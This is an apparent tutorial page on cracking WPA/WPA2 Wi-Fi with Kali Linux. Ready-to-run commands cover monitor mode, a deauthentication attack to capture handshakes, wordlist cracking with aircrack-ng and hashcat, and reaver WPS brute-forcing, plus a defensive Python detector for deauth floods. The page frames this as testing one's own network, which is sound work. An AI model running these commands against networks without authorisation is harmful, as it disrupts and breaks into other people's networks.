2019

Wifi Cracking

Wifi Cracking Basic Commands

Performing a penetration test on your own Wi-Fi network using Kali Linux is a methodical process that uses ethical hacking practices to uncover security weaknesses, so that your network is resilient against unauthorized access. It typically begins by putting your wireless adapter into monitor mode, a specialized state in which it captures all nearby wireless traffic rather than connecting to a single network. Tools like airmon-ng from the aircrack-ng suite are essential here: they let you stop interfering processes (e.g., NetworkManager) and enable monitoring on interfaces such as wlan0, which is usually renamed to wlan0mon once monitor mode is active. Once the adapter is ready, reconnaissance begins with airodump-ng, a tool that scans the airwaves for nearby networks and logs critical details like the target's BSSID (MAC address), operating channel, and ESSID (network name).

1. Preparation

Enable Monitor Mode
  • Check your wireless interface (typically wlan0):
    iwconfig
    
  • Kill interfering processes (like NetworkManager):
    sudo airmon-ng check kill
    
  • Enable monitor mode on your interface (e.g., wlan0):
    sudo airmon-ng start wlan0
    
    Your monitor interface will usually be renamed to wlan0mon.

2. Reconnaissance

Scan for Wi-Fi Networks
  • Use airodump-ng to detect nearby networks:
    sudo airodump-ng wlan0mon
    
    Note your target's BSSID (MAC address), channel, and ESSID (network name).

3. Capture Handshake (WPA/WPA2)

Target a Specific Network
  • Start capturing packets on the target’s channel (e.g., channel 6):
    sudo airodump-ng --bssid [BSSID] -c [Channel] --write [File_Name] wlan0mon
    
    Example:
    sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 --write capture wlan0mon
    
    This saves data to capture-01.cap (airodump-ng appends a counter to the prefix, which is why step 4 uses capture-01.cap), along with .csv and .kismet.csv summaries.

Force a Handshake Capture (Deauth Attack)
  • Send deauthentication packets to trigger a reconnection:
    sudo aireplay-ng --deauth 0 -a [BSSID] wlan0mon
    
    Use -c [Client_MAC] if targeting a specific client. Check airodump-ng for a handshake confirmation (top-right corner).
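From the defender's side, the deauthentication step above leaves a distinctive trace in any monitor-mode capture: a burst of deauth/disassoc frames, usually spoofed from the AP's own MAC to the broadcast address or to one client, far denser than the occasional deauth a real AP sends. The following Python detector is an added example, not code from the original page or from the aircrack-ng suite; it runs over constructed frame records (the `Frame` layout, the sample MACs and the 20-frames-per-10-seconds threshold are assumptions), not over a live capture.

```python
from collections import defaultdict, deque
from dataclasses import dataclass

BROADCAST = "ff:ff:ff:ff:ff:ff"

@dataclass(frozen=True)
class Frame:
    """One parsed 802.11 management frame (constructed record layout, not a pcap parser)."""
    ts: float          # capture time in seconds
    subtype: str       # "deauth", "disassoc", "beacon", ...
    src: str           # transmitter address; a deauth attack spoofs the AP's MAC here
    dst: str           # receiver address: broadcast or a single client
    reason: int = 0    # 802.11 reason code (7 = class 3 frame from nonassociated STA)

def detect_deauth_flood(frames, window=10.0, threshold=20):
    """Return one alert per (src, dst) pair whose deauth/disassoc count within any
    sliding `window` seconds reaches `threshold`. A real AP sends a handful of
    deauths during normal roaming; dozens in ten seconds is the flood pattern."""
    recent = defaultdict(deque)   # (src, dst) -> timestamps of deauths still in window
    alerted, alerts = set(), []
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype not in ("deauth", "disassoc"):
            continue
        key = (f.src, f.dst)
        q = recent[key]
        q.append(f.ts)
        while q and f.ts - q[0] > window:   # drop timestamps older than the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"src": f.src, "dst": f.dst, "count": len(q),
                           "first_ts": q[0], "last_ts": f.ts,
                           "broadcast": f.dst == BROADCAST})
    return alerts

def sample_frames():
    """Constructed sample traffic: 60 s of beacons, two benign deauths, then a flood."""
    ap = "00:11:22:33:44:55"      # constructed AP MAC (the page's placeholder value)
    client = "aa:bb:cc:dd:ee:01"  # constructed client MAC
    frames = [Frame(t / 10, "beacon", ap, BROADCAST) for t in range(600)]
    frames.append(Frame(5.0, "deauth", ap, client, reason=3))    # benign: sparse deauths
    frames.append(Frame(30.0, "deauth", ap, client, reason=3))   # seen in normal roaming
    # Flood: broadcast deauths spoofed from the AP, 10 per second for 5 s
    frames += [Frame(40.0 + i / 10, "deauth", ap, BROADCAST, reason=7) for i in range(50)]
    return frames

if __name__ == "__main__":
    for a in detect_deauth_flood(sample_frames()):
        span = a["last_ts"] - a["first_ts"]
        print(f"deauth flood {a['src']} -> {a['dst']}: {a['count']} frames in {span:.1f}s")
```

The alert fires on the 20th broadcast deauth within the window, while the two isolated client deauths 25 seconds apart never reach the threshold; a wireless IDS applies the same counting to frames decoded from the monitor interface.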

4. Crack the WPA/WPA2 Password

  • Use aircrack-ng with a wordlist (e.g., rockyou.txt):
    sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
    
    Replace capture-01.cap with your file. Success depends on password strength and wordlist quality.

5. Optional: WPS Attacks (if enabled)

  • Brute-force the WPS PIN with reaver:
    sudo reaver -i wlan0mon -b [BSSID] -vv
    
    Modern routers often block this, but older ones may be vulnerable.

6. Post-Test Cleanup

  • Restore your interface to managed mode:
    sudo airmon-ng stop wlan0mon
    
  • Restart NetworkManager:
    sudo systemctl start NetworkManager
    

Additional Tools & Notes

  • Wifite: Automates attacks (scan, capture, crack):
    sudo wifite
    
    Wifite Github
  • Hashcat: Faster GPU-based cracking (convert .cap to .hccapx first):
    hashcat -m 2500 [File].hccapx /usr/share/wordlists/rockyou.txt
    
    Hashcat Github
  • Wordlists: Use crunch to generate custom wordlists.
  • Legality: Only test networks you own or have explicit permission to test.

Ethical Considerations

  • Use strong passwords on your own network; the test above shows whether a wordlist attack can recover them.
  • Modern networks may have defenses (e.g., WPA3, rate-limiting), reducing the effectiveness of these attacks.